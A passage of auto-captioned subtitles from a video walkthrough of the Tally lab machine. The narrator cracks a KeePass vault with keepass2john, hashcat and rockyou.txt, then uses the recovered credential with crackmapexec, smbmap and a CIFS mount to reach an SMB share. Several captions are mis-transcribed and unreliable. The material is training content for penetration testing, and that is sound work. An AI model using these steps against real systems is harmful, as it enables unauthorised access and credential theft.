what we want to look for, like grep mirror, so we can mirror the page.

391
00:31:38,170 --> 00:31:41,580
Of course, we're going to need an option of putting in a password.

392
00:31:41,620 --> 00:31:46,000
So if we search for "user" in the help, case-insensitive search, that's what the dash i does.

393
00:31:46,000 --> 00:31:48,670
We can see that we can do --user= the user name.

394
00:31:49,540 --> 00:31:51,040
And it's probably something for passwords.

395
00:31:52,600 --> 00:31:53,080
Yes.

396
00:31:54,910 --> 00:32:08,410
--password. So we could do wget --user=ftp_user --password= the password, so you'd

397
00:32:08,410 --> 00:32:14,500
see that this double quote is breaking the shell, because the shell is actually interpreting

398
00:32:14,500 --> 00:32:21,340
this double quote, instead of treating it literally so we could try to escape it by putting a backslash

399
00:32:21,340 --> 00:32:21,640
there.

400
00:32:22,480 --> 00:32:25,660
But what I like to do is I just like to put it in quotes.

401
00:32:26,500 --> 00:32:30,710
Hopefully the single quote won't be treated as a literal part of the password string itself.

402
00:32:31,750 --> 00:32:34,030
And then lastly, we just need the endpoint

403
00:32:36,820 --> 00:32:39,850
to make sure this works.

404
00:32:39,990 --> 00:32:40,990
Looks like it's working. Control-B,

405
00:32:40,990 --> 00:32:41,860
Z to go big.

406
00:32:42,400 --> 00:32:44,560
Everything is being downloaded right now.

407
00:32:46,280 --> 00:32:51,330
So this is a good sign that we'll wait for this to finish and then we will jump back in, right.

408
00:32:51,530 --> 00:32:55,970
Looks like we have finished. Let's go ahead, kill this top pane.

409
00:32:57,200 --> 00:32:58,010
Let's see what it's called.

410
00:32:58,030 --> 00:33:02,780
The Zero move tally listening that FTB and FTP.

411
00:33:04,730 --> 00:33:06,680
What we have we've got these all these folders.

412
00:33:06,980 --> 00:33:11,960
You know, the easy way to browse through this is to use tree. We don't have it, so we can install

413
00:33:11,960 --> 00:33:13,420
it. sudo apt

414
00:33:16,670 --> 00:33:20,000
search tree, see what it is.

415
00:33:22,940 --> 00:33:24,050
There is something called tree.

416
00:33:26,890 --> 00:33:29,750
Tree displays an indented directory tree, in color.

417
00:33:29,800 --> 00:33:35,260
That's basically what it does, and this is what we install. sudo apt install tree, it's going to

418
00:33:35,260 --> 00:33:38,830
have to install tree, dash y to say yes to all the defaults.

419
00:33:40,000 --> 00:33:40,780
Let's grab this

420
00:33:46,720 --> 00:33:50,660
tree, so now we can do tree 40 that each.

421
00:33:52,090 --> 00:33:58,090
This actually gives us the file sizes. tree --help.

422
00:33:59,170 --> 00:34:01,300
We can see that we can actually specify the depth

423
00:34:04,270 --> 00:34:07,830
-L level, descend only level directories deep.

424
00:34:07,840 --> 00:34:08,020
Right.

425
00:34:08,020 --> 00:34:12,910
Because if we do a tree like this, in this case, it's not too bad.

426
00:34:13,150 --> 00:34:17,320
But if you have a lot of folders and files that are nested, it can take a really, really long time.

427
00:34:17,890 --> 00:34:18,170
Right.

428
00:34:18,190 --> 00:34:19,810
So let's see what we have.

429
00:34:20,380 --> 00:34:24,040
And we've got 27 directories and 230 files.

430
00:34:25,150 --> 00:34:30,790
And the one that's sticking out to me right away is in Tim's folder, under a folder called Files.

431
00:34:31,840 --> 00:34:36,490
There is a KeePass file, which, if you didn't know, KeePass is a password manager.

432
00:34:37,790 --> 00:34:39,640
For example, if I go to brb, take this off

433
00:34:42,480 --> 00:34:43,690
declasse, just Google.

434
00:34:43,800 --> 00:34:50,860
KeePass Password Safe, free, open-source password manager primarily for Windows, but it's also

435
00:34:50,860 --> 00:34:53,980
supported on the Linux operating system through the use of Mono.

436
00:34:54,640 --> 00:35:00,730
I don't know why the heck they named it that, considering that mono is a disease,

437
00:35:01,300 --> 00:35:01,820
anyway.

438
00:35:02,200 --> 00:35:04,330
So we've got, we can get KeePass.

439
00:35:08,050 --> 00:35:14,020
And this is what we should do now. We could very quickly scroll up, see what else we have, a bunch

440
00:35:14,020 --> 00:35:15,700
of FTP files, log files.

441
00:35:16,510 --> 00:35:24,040
If we do tree again with the dash h to put it in human-readable format for the file sizes, we can

442
00:35:24,040 --> 00:35:26,640
scroll up and take a look at how big these files are. They're all the same.

443
00:35:27,130 --> 00:35:33,130
Twenty eight K. Got a binary in here, Firefox. Maybe the target environment is using Firefox, this

444
00:35:33,130 --> 00:35:35,950
particular version, so we could look for exploits against that version.

445
00:35:37,690 --> 00:35:41,590
A few other 94 KB files in this folder

446
00:35:44,500 --> 00:35:45,190
is file.

447
00:35:45,200 --> 00:35:46,720
We could try to open that.

448
00:35:48,310 --> 00:35:53,410
There might be some sensitive information in there, maybe some credentials, but a PDF.

449
00:35:56,350 --> 00:36:03,830
I see a new folder that doesn't go anywhere, so we don't need to go in there and that's about it.

450
00:36:03,850 --> 00:36:10,420
So I think where we should go right now, the data is telling us we should go to Tim's files and then

451
00:36:10,660 --> 00:36:12,880
look at this tim.kdbx.

452
00:36:12,890 --> 00:36:13,720
I wonder what that is.

453
00:36:14,800 --> 00:36:18,520
cd users.

454
00:36:19,090 --> 00:36:23,320
Tim, files. file this file.

455
00:36:23,380 --> 00:36:28,630
tim.kdbx, KeePass database manager.

456
00:36:29,620 --> 00:36:29,980
Right.

457
00:36:31,090 --> 00:36:32,710
This is actually the database itself.

458
00:36:33,130 --> 00:36:38,900
So first we need to install KeePass, because I don't think we have it yet.

459
00:36:38,920 --> 00:36:39,820
We don't have it right now.

460
00:36:40,270 --> 00:36:42,030
sudo apt search

461
00:36:42,170 --> 00:36:42,970
keepass.

462
00:36:45,920 --> 00:36:50,540
We have keepass2 and keepassxc.

463
00:36:53,300 --> 00:37:01,060
See, I don't think it really matters which one we get. Let's get keepassxc, it sounds cool.

464
00:37:08,890 --> 00:37:13,840
And then let's move this file to

465
00:37:18,040 --> 00:37:18,870
the root right here.

466
00:37:29,540 --> 00:37:30,740
Yeah, this right here.

467
00:37:33,930 --> 00:37:41,880
Oh, you know what happened. So, yeah, basically what I tried to do, so dollar underscore, it tries

468
00:37:41,880 --> 00:37:46,260
to refer to the last part of the last command, and I was then trying to cd into that.

469
00:37:46,260 --> 00:37:54,360
But there's no folder called tilde forward slash boxes forward slash tally forward slash dot.

470
00:37:55,050 --> 00:38:01,110
This folder exists without the dot right there, just the home to write off any working directory.

471
00:38:02,400 --> 00:38:10,590
This refers to the, this character here, and then this is a folder that exists, but this dot doesn't.

472
00:38:10,620 --> 00:38:16,320
So then when I did cd dollar underscore, trying to go to this last part of the last command, which doesn't

473
00:38:16,320 --> 00:38:16,770
exist.

474
00:38:17,850 --> 00:38:22,980
So I bet if I didn't include that, it would have taken me into that folder, which is what I wanted.

475
00:38:24,000 --> 00:38:30,420
So that's just a little bash-fu for people that like to know about pretty cool commands and stuff that

476
00:38:30,420 --> 00:38:32,190
you can do. Anyway.

477
00:38:32,670 --> 00:38:34,080
And we should have copied it up.

478
00:38:34,080 --> 00:38:46,650
So let's go to boxes, tally, and we have it there, and we should have KeePass now. keepassxc.

479
00:38:47,400 --> 00:38:49,260
We're just going to point it to this directory here.

480
00:38:49,560 --> 00:38:51,360
So Database, Open Database,

481
00:38:53,700 --> 00:38:56,670
boxes, tally, so we can hit open.

482
00:38:58,320 --> 00:39:04,950
Nice, except we don't have a password. Unable to open the database: wrong key or database file is corrupt.

483
00:39:07,980 --> 00:39:13,740
So what are we going to do? Brute force this? That would take forever. Or we could look at

484
00:39:16,590 --> 00:39:17,790
some scripts from John.

485
00:39:19,750 --> 00:39:19,870
Right.

486
00:39:19,920 --> 00:39:23,670
So John is a password cracker and includes all these scripts that you can use to convert different things

487
00:39:23,670 --> 00:39:26,460
to a format that John can use so that he can crack it.

488
00:39:27,390 --> 00:39:31,140
So we can look to see if there is, like, a keepass2john.

489
00:39:31,140 --> 00:39:31,950
There is.

490
00:39:32,100 --> 00:39:36,210
I just typed keepass and tab-completed.

491
00:39:39,210 --> 00:39:48,420
So that is definitely a file and we can put in the database name and part 1.0 scap what I want to do

492
00:39:48,420 --> 00:39:48,660
that

493
00:39:51,630 --> 00:39:52,590
I didn't need to consider.

494
00:39:52,890 --> 00:39:59,520
OK, here we have the hash format, so now we can crack this in John, or we can use hashcat, which is my

495
00:39:59,520 --> 00:39:59,840
favorite.

496
00:39:59,850 --> 00:40:03,720
I like using hashcat, so let's do control A C, a comma.

497
00:40:04,770 --> 00:40:05,880
Let's do brute force.

498
00:40:06,420 --> 00:40:10,620
Brute force, technically it's not brute force, it's a dictionary attack.

499
00:40:13,140 --> 00:40:20,910
Let's be lexically correct, and then let's do it in tmux to log everything we're doing here.

500
00:40:22,020 --> 00:40:22,770
We have hashcat.

501
00:40:24,630 --> 00:40:24,990
We do.

502
00:40:24,990 --> 00:40:26,370
We have version 6.1.1.

503
00:40:27,080 --> 00:40:34,840
Now let's go ahead and grep for example-hashes: show an example hash for each hash mode.

504
00:40:34,860 --> 00:40:35,520
That's what we want.

505
00:40:35,520 --> 00:40:41,100
So we want to go up, and let's see, hashcat --example-hashes.

506
00:40:41,100 --> 00:40:44,280
We get way too many.

507
00:40:44,460 --> 00:40:52,740
So let's do a grep for, like, keepass, and we see a hash and we see a type, but we don't get the mode.

508
00:40:53,190 --> 00:40:57,930
Notice, if you look at the format up here, you have a hash; before that you have a type, and before

509
00:40:57,930 --> 00:40:58,620
that you have a mode.

510
00:40:58,630 --> 00:41:00,750
So we want to go before by maybe one.

511
00:41:01,590 --> 00:41:01,960
Right.

512
00:41:01,970 --> 00:41:05,730
So we can do dash B, for before, go before one line.

513
00:41:08,820 --> 00:41:12,900
And now we have the mode, so technically we have what we need, we just need to put this hash in a

514
00:41:12,900 --> 00:41:13,320
file.

515
00:41:15,690 --> 00:41:16,590
Let's split the pane.

516
00:41:18,110 --> 00:41:21,740
Let's vim hash.txt.

517
00:41:24,390 --> 00:41:27,750
Which, uh, does not look right.

518
00:41:33,020 --> 00:41:34,200
And that's what I said.

519
00:41:34,210 --> 00:41:35,590
Look, that's what it should look like.

520
00:41:35,620 --> 00:41:37,660
It starts with Tim. I'm not sure

521
00:41:37,680 --> 00:41:38,730
why I didn't grab everything.

522
00:41:40,740 --> 00:41:43,100
Let's go back then.

523
00:41:43,140 --> 00:41:43,840
I control.

524
00:41:43,890 --> 00:41:44,370
Should be.

525
00:41:44,550 --> 00:41:45,060
There we go.

526
00:41:46,290 --> 00:41:47,340
Now that just reminds me.

527
00:41:47,900 --> 00:41:52,640
This starts with Tim, the user we want to crack, but the format hashcat wants does not.

528
00:41:52,650 --> 00:41:53,840
It starts with dollar.

529
00:41:53,870 --> 00:41:54,780
keepass dollar.

530
00:42:00,040 --> 00:42:03,760
So this is a little bit different.

531
00:42:05,620 --> 00:42:10,950
This is dollar keepass dollar here, so we probably need to truncate or sort of remove this Tim prefix,

532
00:42:10,960 --> 00:42:13,810
or perhaps hashcat will crack it.

533
00:42:17,260 --> 00:42:25,720
Press g twice to get to the beginning of the document. Shift,

534
00:42:25,840 --> 00:42:26,730
Z Z to save.

535
00:42:27,390 --> 00:42:29,050
It's now a conditional cash card.

536
00:42:29,990 --> 00:42:41,740
The mode is 13400, control of the hashes.

537
00:42:41,740 --> 00:42:43,790
And then we need the word list.

538
00:42:45,020 --> 00:42:46,210
I'm not sure we have

539
00:42:48,880 --> 00:42:49,120
now.

540
00:42:49,120 --> 00:42:53,170
We have the compressed form of the list.

541
00:42:55,210 --> 00:43:07,270
But this is not very, it's going to be very resource intensive to crack something like

542
00:43:07,270 --> 00:43:07,600
this.

543
00:43:11,200 --> 00:43:17,140
And then what I want to do is I just want to run against this to show you the size.

544
00:43:18,610 --> 00:43:19,360
Fifty one megabyte.

545
00:43:19,360 --> 00:43:19,680
Right.

546
00:43:19,690 --> 00:43:20,440
Compressed.

547
00:43:21,370 --> 00:43:25,660
So we need the rockyou.txt uncompressed, which will give us better performance.

548
00:43:34,960 --> 00:43:36,100
And of course you know where I'm going.

549
00:43:36,100 --> 00:43:38,250
I'm going to Google up.

550
00:43:38,280 --> 00:43:39,160
That's throwing the word.

551
00:43:44,590 --> 00:43:50,260
There we go, and this is it. It says native Cattail, I'm pretty sure this is what I want.

552
00:43:50,980 --> 00:43:53,850
File should be like a hundred and thirty six megabytes or something like that.

553
00:43:54,930 --> 00:43:55,890
One hundred thirty three.

554
00:43:56,350 --> 00:43:56,950
So we'll save it.

555
00:44:02,310 --> 00:44:10,950
Right, downloading. Let's go ahead and get ready to pull it over. sudo mv Downloads, rockyou

556
00:44:10,960 --> 00:44:12,720
.txt, put it right here.

557
00:44:13,290 --> 00:44:14,520
So we put that down to finish.

558
00:44:19,150 --> 00:44:22,080
OK, you.

559
00:44:25,840 --> 00:44:30,040
Seek to complete the works, to complete works, at least, and what does it say?

560
00:44:32,440 --> 00:44:35,960
hash.txt, line one, something's wrong with this format. So hash.txt.

561
00:44:38,080 --> 00:44:39,460
Yeah, I didn't copy it correctly.

562
00:44:40,570 --> 00:44:44,230
You see here it looks like this.

563
00:44:44,230 --> 00:44:46,200
It starts with dollar keepass dollar here.

564
00:44:46,200 --> 00:44:47,500
It's showing something completely different.

565
00:44:47,510 --> 00:44:51,880
So let's go back to what we're doing.

566
00:44:53,630 --> 00:44:54,780
Where are we here.

567
00:44:54,790 --> 00:44:55,200
Yes.

568
00:44:55,420 --> 00:44:56,080
About this again.

569
00:44:56,800 --> 00:45:02,560
Right from you know, right from that dollar sign to the end.

570
00:45:03,700 --> 00:45:03,940
Right.

571
00:45:03,940 --> 00:45:07,930
Click copy, control A 3 to switch over to vim.

572
00:45:09,520 --> 00:45:16,510
hash.txt, delete the line, i, put it back.

573
00:45:16,540 --> 00:45:17,200
It looks good.

574
00:45:17,470 --> 00:45:18,670
Escape, Z Z.

575
00:45:19,510 --> 00:45:21,670
Up, up, up front.

576
00:45:22,630 --> 00:45:23,800
Yes, that's what we want.

577
00:45:23,800 --> 00:45:25,510
So to exit this one.

578
00:45:26,230 --> 00:45:27,940
Let hashcat do its thing.

579
00:45:29,560 --> 00:45:30,610
Very, very awesome.

580
00:45:30,850 --> 00:45:38,050
So you can see hashcat finished, used rockyou.txt to check this many passwords, which looks like

581
00:45:38,050 --> 00:45:40,450
it is fourteen million lines

582
00:45:43,390 --> 00:45:48,160
and it looks like it took between fourteen thirty-eight and fourteen thirty-six.

583
00:45:48,160 --> 00:45:51,340
So it's like about two minutes to run again.

584
00:45:51,340 --> 00:45:59,200
I'm actually running this in a virtual machine, so if I show you the specs on this guy, you open this

585
00:45:59,200 --> 00:45:59,620
pane up.

586
00:46:04,390 --> 00:46:08,230
Right, click settings, you can see what I'm working with.

587
00:46:08,410 --> 00:46:15,250
I don't have a special cracking rig, you know, with the multiple Nvidia, you know, GeForce GPUs

588
00:46:15,250 --> 00:46:15,940
and all that stuff.

589
00:46:16,250 --> 00:46:24,290
Got four gigabytes of memory, two CPUs, and a 40 gigabyte hard drive. As far as the advanced features go,

590
00:46:24,910 --> 00:46:29,530
You know, I'm not using Zaytoun medications for help or being able to hosts, which improves my performance

591
00:46:29,530 --> 00:46:29,980
a little bit.

592
00:46:30,460 --> 00:46:32,830
This is VMware Workstation 16.

593
00:46:33,130 --> 00:46:37,720
So your mileage may vary, but that's pretty much what I found.

594
00:46:37,720 --> 00:46:39,130
So you might be wondering, where's the password?

595
00:46:39,710 --> 00:46:40,420
It's actually right here.

596
00:46:41,790 --> 00:46:48,510
At the end of the string. By the way, you could also find it if you, for example, cd to this

597
00:46:49,020 --> 00:46:54,720
and you want to find it again without really cracking, you could just type --show and it'll show it.

598
00:46:56,730 --> 00:47:01,140
Now, one other thing we could do is if you want to know where this was inside of the file, you could

599
00:47:01,140 --> 00:47:04,620
do, like, grep -in

600
00:47:07,230 --> 00:47:07,830
regex.

601
00:47:07,830 --> 00:47:15,300
So it starts with simple Monteil and ends with that.

602
00:47:15,330 --> 00:47:21,030
So this word is on the line by itself, and we want to search rockyou, and we can see it actually came

603
00:47:21,030 --> 00:47:22,260
up with a bunch of different lines.

604
00:47:23,010 --> 00:47:28,260
But the one that we found was right here on line twenty four thousand six hundred eighty eight.

605
00:47:29,940 --> 00:47:30,590
So that's kind of cool.

606
00:47:32,090 --> 00:47:33,300
All right, so now what do we do with this?

607
00:47:33,320 --> 00:47:36,080
Well, we've got a cred, so let's put it in our credential file,

608
00:47:43,270 --> 00:47:49,250
KeePass vault, cracked with hashcat.

609
00:47:50,180 --> 00:47:50,510
Right.

610
00:47:50,710 --> 00:47:51,380
That's what we want.

611
00:47:53,300 --> 00:47:56,090
And now let's go over to KeePass.

612
00:47:56,090 --> 00:47:56,850
We still have it running.

613
00:47:56,870 --> 00:47:57,740
I don't think we do.

614
00:47:58,650 --> 00:48:03,980
Let's go ahead and launch it. Loving the dark theme.

615
00:48:05,300 --> 00:48:07,060
That is, I'm a huge fan of dark themes.

616
00:48:07,960 --> 00:48:10,520
It doesn't cost them right.

617
00:48:10,580 --> 00:48:12,260
Click the eyeball to make sure we got it in correctly.

618
00:48:12,260 --> 00:48:13,130
We do OK.

619
00:48:14,420 --> 00:48:16,500
And bam, we're inside now.

620
00:48:16,590 --> 00:48:17,870
Nothing in the personal directory.

621
00:48:17,870 --> 00:48:21,920
We can keep browsing through these directories and see what we find.

622
00:48:21,920 --> 00:48:22,880
We've got something here.

623
00:48:24,300 --> 00:48:25,790
Finance, do you see?

624
00:48:28,640 --> 00:48:29,540
And we've got a cred.

625
00:48:30,530 --> 00:48:32,930
And if you look at this, it says tally aked share.

626
00:48:32,930 --> 00:48:39,290
This is probably an SMB share, so we can make note of that. sudo, Democrats.

627
00:48:44,360 --> 00:48:46,390
Jeez, I spelled that wrong.

628
00:48:46,940 --> 00:48:47,420
There we go.

629
00:48:48,080 --> 00:48:49,310
KeePass vault,

630
00:48:52,520 --> 00:48:53,060
inside.

631
00:48:53,060 --> 00:48:53,600
KeePass vault.

632
00:48:53,610 --> 00:48:55,160
It should be.

633
00:48:56,840 --> 00:48:58,220
And it was finance

634
00:49:05,360 --> 00:49:06,350
cred for

635
00:49:09,200 --> 00:49:10,820
aked share.

636
00:49:13,460 --> 00:49:14,060
That's good, right.

637
00:49:15,140 --> 00:49:15,620
All right.

638
00:49:15,950 --> 00:49:19,060
So what we're going to do, we're going to try to go here.

639
00:49:19,070 --> 00:49:20,150
Let's see if we have crackmapexec.

640
00:49:20,150 --> 00:49:27,160
We don't. sudo apt search crackmapexec, see how that works; never actually tried to install

641
00:49:27,160 --> 00:49:27,590
it that way.

642
00:49:27,950 --> 00:49:32,840
So in case you're wondering what crackmapexec is, try saying that ten times fast.

643
00:49:33,800 --> 00:49:40,400
And it's sort of like a Swiss Army knife pentesting tool for engagements.

644
00:49:40,400 --> 00:49:43,340
You can do a bunch of different things, a bunch of network based attacks.

645
00:49:44,900 --> 00:49:51,320
You know, there's a lot of work put into this, particularly by byt3bl33d3r, who

646
00:49:51,320 --> 00:49:52,640
is pretty awesome.

647
00:49:53,330 --> 00:49:55,310
But, you know, we can look at this tool, we can use it.

648
00:49:55,670 --> 00:49:58,520
And we're just basically trying to see what we can do with these SMB shares.

649
00:49:58,820 --> 00:49:59,090
Right.

650
00:49:59,090 --> 00:50:04,610
Can we log in to the target using the credentials that we discovered in the KeePass

651
00:50:04,610 --> 00:50:05,260
password vault?

652
00:50:06,860 --> 00:50:07,940
This tool is legit.

653
00:50:08,480 --> 00:50:08,810
All right.

654
00:50:08,810 --> 00:50:14,690
So let's just make sure. By the way, wherever you see Black Hills, you know, it's

655
00:50:14,690 --> 00:50:16,460
legit. Enough said.

656
00:50:16,970 --> 00:50:20,900
And I don't work for Black Hills, they're just really that good.

657
00:50:21,200 --> 00:50:25,400
OK, so let's go ahead and see what's going on here.

658
00:50:25,400 --> 00:50:28,700
It's still installing, so wait for this to finish and then we'll jump back in.

659
00:50:30,170 --> 00:50:30,470
All right.

660
00:50:30,470 --> 00:50:31,280
So this is done.

661
00:50:31,400 --> 00:50:33,020
Let's see if we can run crackmap

662
00:50:33,020 --> 00:50:33,530
exec.

663
00:50:33,530 --> 00:50:34,100
We can.

664
00:50:35,130 --> 00:50:42,170
This is a beast of a tool, so we don't want to get too deep in there, but we do want to run some useful

665
00:50:42,170 --> 00:50:42,500
commands.

666
00:50:42,500 --> 00:50:46,540
So let's run, like, --help, which I just ran.

667
00:50:47,000 --> 00:50:48,260
So I just repeated myself.

668
00:50:48,380 --> 00:50:48,710
Great.

669
00:50:51,190 --> 00:50:59,470
Now, there used to be an SMB command here, which I don't see. Let's sort of apt search cme.

670
00:50:59,500 --> 00:51:00,790
I don't know if this is what I think it is.

671
00:51:14,730 --> 00:51:20,830
If you see here, cme: check or edit configuration data with Config::Model. This is not what we wanted.

672
00:51:21,970 --> 00:51:22,960
That is hilarious.

673
00:51:23,500 --> 00:51:30,970
So let's go to their website and let's see the correct way to install this.

674
00:51:33,280 --> 00:51:41,550
OK, see, we could use Docker, and we could use pipx, which says it's also pretty easy, so let's

675
00:51:41,570 --> 00:51:42,470
just go and do this.

676
00:51:44,990 --> 00:51:45,470
This method.

677
00:52:01,150 --> 00:52:03,460
pipx ensurepath.

678
00:52:06,130 --> 00:52:11,260
And then lastly, pipx install crackmapexec.

679
00:52:16,630 --> 00:52:26,380
OK, it was not created because ensurepip is not available. We need to install that: sudo apt install

680
00:52:26,410 --> 00:52:28,210
python3-venv.

681
00:52:36,480 --> 00:52:39,540
I forgot how much of a beast crackmapexec is to install.

682
00:52:44,480 --> 00:52:49,160
Oh, right, so cme is now available, and crackmap

683
00:52:49,520 --> 00:52:50,180
Exactly.

684
00:52:50,210 --> 00:52:52,510
I love the emoticons down here supercool.

685
00:52:52,910 --> 00:52:54,020
I wonder how they're doing that.

686
00:52:54,020 --> 00:53:01,790
So we should be able to run it. And we don't want to... I originally renamed this, by the way, to cme.

687
00:53:03,920 --> 00:53:05,090
So you don't need cme.

688
00:53:10,890 --> 00:53:17,070
Because we have the other command still there to do this, you know, crackmapexec.

689
00:53:17,110 --> 00:53:17,800
Exactly.

690
00:53:18,870 --> 00:53:19,440
That works.

691
00:53:21,300 --> 00:53:21,720
All right.

692
00:53:21,730 --> 00:53:22,260
That's what I want.

693
00:53:23,310 --> 00:53:30,750
OK, so what we want to do now is run SMB, right? What we could do is go back to this previous command

694
00:53:34,470 --> 00:53:37,140
and just change this to crackmapexec.

695
00:53:37,150 --> 00:53:37,670
Exactly.

696
00:53:38,370 --> 00:53:39,690
See if this gets us what we want.

697
00:53:40,760 --> 00:53:41,250
It does.

698
00:53:41,250 --> 00:53:45,320
So it's running and we can see we've got ready access to the accounting share.

699
00:53:47,100 --> 00:53:48,480
Now what do we want to do here?

700
00:53:48,680 --> 00:53:49,470
Well, we want to read it.

701
00:53:49,800 --> 00:53:50,460
How can we do that?

702
00:53:51,000 --> 00:53:52,440
We can use smbmap to do that.

703
00:53:53,220 --> 00:53:53,430
We could.

704
00:53:53,430 --> 00:53:55,310
Or CrackMapExec as well.

705
00:53:55,320 --> 00:54:01,830
But I like showing off as many tools as possible so that you can really learn how to run an

706
00:54:01,830 --> 00:54:03,450
engagement and how to work.

707
00:54:04,540 --> 00:54:10,520
So smbmap -h, to see what our options are.

708
00:54:11,610 --> 00:54:20,550
We can say tack u Finance, tack p, write your password.

709
00:54:21,780 --> 00:54:24,150
Oops, we don't have a password on our clipboard anymore.

710
00:54:30,370 --> 00:54:31,230
Joseph C..

711
00:54:35,100 --> 00:54:42,210
Tack s for the accounting share, and then I believe we just need the host, which is tack H.

712
00:54:47,640 --> 00:54:48,010
Tally.

713
00:54:55,890 --> 00:55:03,210
So, again, we see now what we can do is we can actually read it, which I believe we go into the help,

714
00:55:03,210 --> 00:55:06,160
we should see that somewhere here.

715
00:55:06,190 --> 00:55:06,570
Yeah.

716
00:55:07,230 --> 00:55:08,490
What are the contents of the directory?

717
00:55:11,690 --> 00:55:18,590
So we can do tack r if you want to list the contents of this directory.

718
00:55:28,080 --> 00:55:32,280
And you can see a bunch of, again, folders now. You know, I don't want to have to browse through

719
00:55:32,280 --> 00:55:37,320
these folders like this instead, I think it's better if we just mount this entire share locally on

720
00:55:37,320 --> 00:55:39,690
our box and then we can copy everything down.

721
00:55:40,140 --> 00:55:44,310
And my first point of attack is going to be go to this folder migration, because if you remember when

722
00:55:44,310 --> 00:55:51,510
we went and we were exploring the SharePoint site, it's called Migration Update, and that's where

723
00:55:51,510 --> 00:55:55,180
we found these credentials, this laptop user account.

724
00:55:55,200 --> 00:56:00,960
So I think that should be our plan of attack for at least starting things off.

725
00:56:01,680 --> 00:56:16,140
So how are we going to do this? Make a new directory, mkdir smb, then sudo mount, tack t cifs, and the

726
00:56:17,430 --> 00:56:18,090
options, tack o:

727
00:56:18,090 --> 00:56:21,060
username equals Finance,

728
00:56:21,840 --> 00:56:25,410
password equals this.

729
00:56:26,310 --> 00:56:29,400
And what we want to do, we want to mount.

730
00:56:32,100 --> 00:56:40,710
//10.10.10.59 and the accounting share, into this current folder.

731
00:56:41,430 --> 00:56:42,060
See that works.

732
00:56:43,260 --> 00:56:44,220
And you see it is bad:

733
00:56:44,220 --> 00:56:48,870
You should notice that it doesn't have a slash separating the nine and the A.

734
00:56:50,520 --> 00:56:52,590
That's because this forward slash escaped me.

735
00:56:53,010 --> 00:56:58,870
So we need to escape each slash so that we get a slash here. That makes sense, for example.

736
00:56:58,950 --> 00:57:05,970
But escape it here, now I get to here, but I don't get the other slash, right?

737
00:57:05,980 --> 00:57:06,630
We need two slashes.

738
00:57:06,720 --> 00:57:10,090
So that means I need to put two more slashes to escape each.

739
00:57:11,490 --> 00:57:15,080
It sounds crazy, but that's because of Linux, right?

740
00:57:15,090 --> 00:57:16,110
You have to escape the slashes.

741
00:57:16,850 --> 00:57:19,950
So now there's nothing here.

742
00:57:19,950 --> 00:57:23,550
But if we go up there, we go back in.

743
00:57:24,480 --> 00:57:25,170
We have everything.

744
00:57:25,740 --> 00:57:26,930
Obviously a great place for tree.

745
00:57:27,510 --> 00:57:31,110
Are you sure? It's going to take a really long time.

746
00:57:31,230 --> 00:57:32,620
Right? So

747
00:57:32,670 --> 00:57:38,220
the thing we could do is set the level to two.

748
00:57:40,680 --> 00:57:43,080
Tack L, level descent, only two levels deep.

749
00:57:44,700 --> 00:57:46,310
So that's a little bit more manageable.

750
00:57:50,030 --> 00:57:54,890
But we already know that we want to start in the migration folder, so let's go into there.

751
00:58:01,770 --> 00:58:02,410
Where am I?

752
00:58:02,700 --> 00:58:03,310
Where am I?

753
00:58:03,600 --> 00:58:04,000
Where am I?

754
00:58:04,020 --> 00:58:04,520
What am I doing?

755
00:58:06,990 --> 00:58:08,880
cd boxes/tally.

756
00:58:09,860 --> 00:58:11,150
All right, see me.

757
00:58:11,890 --> 00:58:12,270
All right.

758
00:58:13,950 --> 00:58:14,640
Oh, my gosh.

759
00:58:18,230 --> 00:58:25,220
My connection is a little bit slow, that's the problem, there's some lag here trying to get out to it.

760
00:58:29,410 --> 00:58:29,660
Right.

761
00:58:29,710 --> 00:58:33,230
Some backup folders and some binaries, in migration.

762
00:58:33,580 --> 00:58:34,480
Let's start with backup.

763
00:58:38,260 --> 00:58:38,950
See what's in here.

764
00:58:44,260 --> 00:58:44,660
I don't know.

765
00:58:44,680 --> 00:58:45,940
I mean, we could go deeper into that.

766
00:58:46,030 --> 00:58:50,290
Could do like a tree three, three levels deep.

767
00:58:53,570 --> 00:58:58,520
And I'm seeing some things, looks like some configuration files, there may be credentials in here,

768
00:58:58,640 --> 00:59:01,520
it could take forever to search through all 70 directories.

769
00:59:02,780 --> 00:59:09,980
So let's go back out, let's back up, pun intended, out of the backup directory and

770
00:59:12,800 --> 00:59:15,110
I'm intrigued, and then we've got binaries, let's go in there.

771
00:59:22,650 --> 00:59:23,730
This is a lot of stuff.

772
00:59:26,470 --> 00:59:31,340
Do we need to exclude the cab files?

773
00:59:31,350 --> 00:59:32,430
Is there a way to do that with tree?

774
00:59:40,330 --> 00:59:49,720
I know the way you do it: grep, grep --color=always,

775
00:59:55,690 --> 00:59:56,500
--exclude

776
01:00:00,010 --> 01:00:00,730
anything that ends with that.

777
01:00:00,760 --> 01:00:07,960
And tack r, we want to recurse, and we just want to search for everything.

778
01:00:08,740 --> 01:00:09,910
Second, I don't even know.

779
01:00:17,280 --> 01:00:22,840
All right, so it's trying to get a little deeper without giving us all the crazy noise.

780
01:00:24,710 --> 01:00:31,900
So we're seeing some executables, we've got PuTTY and we've got this RDP setup.

781
01:00:31,940 --> 01:00:35,030
Maybe that's an RDP setup, and tester.

782
01:00:36,470 --> 01:00:38,200
I don't know what that is.

783
01:00:39,420 --> 01:00:41,360
And maybe we should look into that.

784
01:00:43,190 --> 01:00:46,250
So let's go into smb.

785
01:00:51,300 --> 01:00:52,050
Migration.

786
01:00:55,420 --> 01:00:56,730
Wow, this is really slow.

787
01:01:00,370 --> 01:01:10,180
cd binaries. Don't make a typo, I don't want to make a typo and create a new folder.

788
01:01:14,320 --> 01:01:20,980
All right, so let's grab this, cp tester, let's put this in

789
01:01:25,240 --> 01:01:26,170
boxes/tally.

790
01:01:30,550 --> 01:01:40,300
What I want to do is do this, given that Dodd said, I want to come back and say this works this time.

791
01:01:43,590 --> 01:01:50,040
It did put it. You see it put the command in the last command, so we can go there and then let's see if

792
01:01:50,040 --> 01:01:50,850
we can look inside.

793
01:01:53,500 --> 01:01:57,340
file tester, it's actually an executable.

794
01:01:58,240 --> 01:02:00,430
Let's stop this for now because it's slowing down our box

795
01:02:03,580 --> 01:02:05,010
and let's take a look at this.

796
01:02:05,050 --> 01:02:10,420
So what we want to do, we could use radare2 against it.

797
01:02:20,460 --> 01:02:23,880
And this might be a step in the right direction.

798
01:02:24,900 --> 01:02:31,590
This could be overkill because, you know, a lot of times you don't actually need to use a reverse

799
01:02:31,590 --> 01:02:33,660
engineering tool like radare2 to just find strings.

800
01:02:33,660 --> 01:02:36,030
But sometimes you can find strings in a file that are very helpful.

